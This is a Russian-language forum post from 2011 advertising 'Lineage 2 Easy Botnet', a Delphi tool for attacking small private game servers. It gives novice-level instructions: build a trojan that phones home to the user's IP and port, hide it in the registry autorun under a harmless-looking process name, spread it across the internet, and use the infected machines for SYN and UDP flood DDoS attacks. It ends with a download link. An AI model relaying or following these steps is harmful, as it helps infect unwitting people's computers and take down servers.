Всем привет,моё имя "Pain" и я очень давно не играл в Lineage 2 . Раньше я был постоянным игроком и был доволен теми временами.
Недавно я решил вернуться в мир линейки ненадолго и был в ужасе. Посетив L2Top.ru я увидел Тысячи Серверов которые открываются и Тысячи серверов которые Вот-Вот закроются.
Ненужные ГФШ то и дело Пускали рекламу. Через месяц бездарные админы школьники сразу прикрывали свои проекты. На всех форумах открываются темы с нытьём из за однодневных серверов.
И вот Мне в Голову пришёл коварный план. План по уничтожению ГФШ.
Использовав свои знания я решил Написать программу для уничтожения ГФШ, Точнее "Клиентский Ботнет" Который лёгок по управлению и которым может овладеть даже самый ТУПОЙ школьник.
Взял я в руки Delphi 7 и включил Мозг. Прошло некоторое время и вот что из этого вышло -
Проект "Lineage 2 Easy Botnet" или Оружие для Толпы по уничтожению ГФШ.
Наверное вам интересно каков же принцип работы программы? Почему она так легка в управлении и почему каждый Нуб сможет ею пользоваться?
Я отвечу на ваши вопросы.
Принцип работы программы : Программа имеет свой клиент (Lineage 2 botnet.exe) и Cтаб (Stub.exe)
Программа работает методом Client >>> Server (Connection через Sockets)
Вы открываете программу Lineage 2 botnet.exe и через меню "Создать сервер" Делаете Вредоносный Троян (Код берётся через stub.exe для генерирования трояна!)
После чего требуется лишь открыть свой порт (Любой но рекомендую 3085) и распостранять вирус по интернету. Все люди которые Откроют Троян сгенерированный через LINEAGE 2 EASY BOTNET Станут зомби и будут подключаться на ваш IP(DNS)/Port (Который вы откроете)
И сидя на определённом открытом порту слушать ваших команд .
Свойства : После создания трояна который вы расостраняете он при включении садится в Реестр Жертвы и добавляется в автозапуск! Тоесть после перезагрузки компьютера жертвы она всё ещё ваш БОТ! До тех пор пока не сотрёт ваш троян антивирусом или другим методом(Если поймёт в чём дело)
Ботнет имеет SSYN (Более мощный вид SYN Флуда) а также UDP Флуд.
Вы можете выбрать уровень Силы Флуда через поле "Левел" - High самый сильный. Vslow- самый низкий уровень флуда.
C помощью распостранения данной программы я планирую уничтожить большую часть ГФШ и Освободить мир от админов школьников.
Именно для этого и делался Lineage 2 botnet , максимально лёгок в использовании!
Инструкция по установке :
Первым делом через модем/роутер открываем порт - Можно открыть любой но я рекомендую 3085 для корректной работы ботов.
После чего идём в папку с Lineage 2 botnet.exe и открываем саму программу.
В верхнем меню выбираем пункт - Создаём сервер и клацаем на него. После того как вы клацнет на "Создать сервер" появится отдельное окошко в котором вы увидите
"Создатель трояна"
Там расположено несколько полей для создания вашего будующего трояна для распостранения
Сейчас я обьясню как это делается.
В первом поле DNS указываем наш IP/No-ip(Dns host) куда будут стучаться зомби
Во втором поле port указываем порт который мы открыли (На который будут коннектится зомби) Желательно 3085!!
В третьем поле ID указываем имя (Любое) которое будет у ботов после подключения (К примеру " Bots" "Zombies " "lols"
В четвёртом поле Reg Key можете ничего не менять (Ключ для реестра) и оставить его таким как есть (Рекомендую)
В пятом поле startup.exe Можете поменять данные но лучше оставить так как есть (Стартовый .exe файл) который будет отображаться у жертвы после перезагрузки в диспетчере задач (Можете назвать его к примеру Systems.exe дабы жертва не заподозрила!)
После всего этого нажимаем кнопку Build Server и через 2 секунды в папке с ботнетом появится файлик
server.exe который и есть ваш троян (Должны его распостранить)
Теперь я приведу вам скриншоты своей работы -
1.Первый вид программы после включения

2. Выбираем Порт для соединений

3. Открываются сокеты и соединяются Боты

4.Генератор вашего трояна выглядит так -

Для проведения DDos атак на средние фришки будет достаточно 20-100 зомби и SSYN Флуда.
Данная программа ИДЕАЛЬНА для всех против ГФШ. С уважением Пейн.
Примечание насчёт Вирусов - Данная программа на 100% Чиста,Вы можете проверить файл Lineage 2 botnet .exe на любом антивирусном сайте или любым другим методом (Sandboxie,Vmware, и тд)
В архиве находящийся stub.exe палится антивирусами так как содержит Вредоносный код генерирующий ваш троян (stub.exe запускать не требуется,он должен лежать в папке с ботнетом для генерации трояна или будет выдавать ошибку ) Оттуда берётся код.
Если вы не верите мне просто не качайте.
Я буду обновлять программу каждый раз и бороться против ГФШ.
Качаем отсюда - mediafire.com/?f6cotndacrtz3ha
Сообщение отредактировал izac: 23 November 2011 - 22:37

Вход